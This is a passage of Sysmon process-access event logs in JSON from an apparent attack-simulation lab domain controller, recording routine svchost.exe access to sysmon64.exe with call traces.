Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2287,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.062\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:55.062","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2288,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.062\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:55.062","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2289,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.062\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:55.062","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2290,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.062\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:55.062","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2291,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.062\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:55.062","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2292,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.062\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:55.062","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2293,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.062\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:55.062","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2294,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:55.062\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:55.062","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
